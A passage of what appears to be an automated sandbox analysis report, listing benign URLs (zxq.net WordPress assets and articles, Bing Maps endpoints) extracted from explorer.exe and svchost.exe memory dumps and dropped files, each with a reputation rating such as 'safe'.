cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://zxq.net/wp-content/uploads/2022/07/What-is-the-Best-Way-to-Learn-Golang-300x187.pngwhat-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://zxq.net/wp-content/uploads/2022/07/What-is-the-Best-Way-to-Learn-Golang-768x478.pngexplorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 00000020.00000002.340148688.000001401B83C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://zxq.net/wp-content/uploads/2022/07/How-To-.pngexplorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://zxq.net/wp-content/plugins/table-of-contents-plus/front.min.js?ver=2106explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://crl.ver)svchost.exe, 00000027.00000002.537391592.000001E1CF612000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		low
                                                    https://zxq.net/wp-content/uploads/2022/07/How-To--1024x609.pngexplorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://zxq.net/why-you-should-seek-an-uber-or-lyft-accident-lawyer/what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://schema.orgexplorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.537973119.0000000003B35000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                      		high
                                                      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 00000020.00000002.339302995.000001401B813000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000002.340148688.000001401B83C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://zxq.net/wp-content/uploads/2022/07/Why-You-Should-Seek-An-Uber-Or-Lyft-Accident-Lawyer-01-45explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://zxq.net/reasons-to-hire-a-truck-accident-attorney/what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://zxq.net/wp-content/uploads/2022/07/Reasons-to-Hire-a-Truck-Accident-Attorney-01-300x169.jpegwhat-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://%s.xboxlive.comsvchost.exe, 00000016.00000002.532432595.0000018D6C440000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		low
                                                        https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000020.00000003.337412785.000001401B861000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000020.00000003.313688080.000001401B831000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://zxq.net/wp-content/uploads/2022/07/Online-Shopping-Tips-During-Covid-01-150x84.jpegexplorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://zxq.net/wp-content/plugins/table-of-contents-plus/screen.min.css?ver=2106explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://zxq.net/wp-content/uploads/2022/07/What-is-the-Best-Way-to-Learn-Golang-150x93.pngexplorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://zxq.net/?s=explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://zxq.net/how-to-find-an-investor-for-your-business/what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://zxq.net/what-happened-to-the-old-zxq-website/;explorer.exe, 00000005.00000002.537973119.0000000003B35000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://zxq.net/wp-content/uploads/2022/07/These-Are-The-Injured-You-May-Suffer-in-a-Bicycle-Accidenwhat-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://dynamic.tsvchost.exe, 00000020.00000003.337301947.000001401B863000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.337483539.000001401B85A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.338015519.000001401B841000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://zxq.net/what-happened-to-the-old-zxq-website/#webpageexplorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000020.00000003.337412785.000001401B861000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://zxq.net/news/entertainment/what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://zxq.net/wp-includes/wlwmanifest.xmlexplorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://zxq.net/wp-content/uploads/2022/03/follow-us-on-google-news-banner-black-300x117.pngwhat-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://zxq.net/wp-content/uploads/2022/07/Best-Mothers-Day-Gifts-of-2022-for-Every-Mom-01-150x84.jpexplorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://zxq.net/wp-content/uploads/2022/07/How-To--1200x714.pngexplorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000020.00000002.340715628.000001401B85C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.337483539.000001401B85A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://zxq.net/wp-content/uploads/2022/07/Reasons-to-Hire-a-Truck-Accident-Attorney-01.jpegexplorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://zxq.net/write-for-us/what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://zxq.net/what-is-the-best-way-to-learn-golang/what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000020.00000003.337483539.000001401B85A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://zxq.net/#organizationwhat-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://zxq.net/wp-content/themes/smart-mag/css/icons/fonts/ts-icons.woff2?v2.2explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.411195559.0000000003B35000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://zxq.net/wp-content/uploads/2022/03/follow-us-on-google-news-banner-black.pngexplorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://zxq.net/wp-content/uploads/2022/07/What-is-the-Best-Way-to-Learn-Golang-1200x747.pngexplorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://zxq.net/news/business/what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                                  • Avira URL Cloud: safe
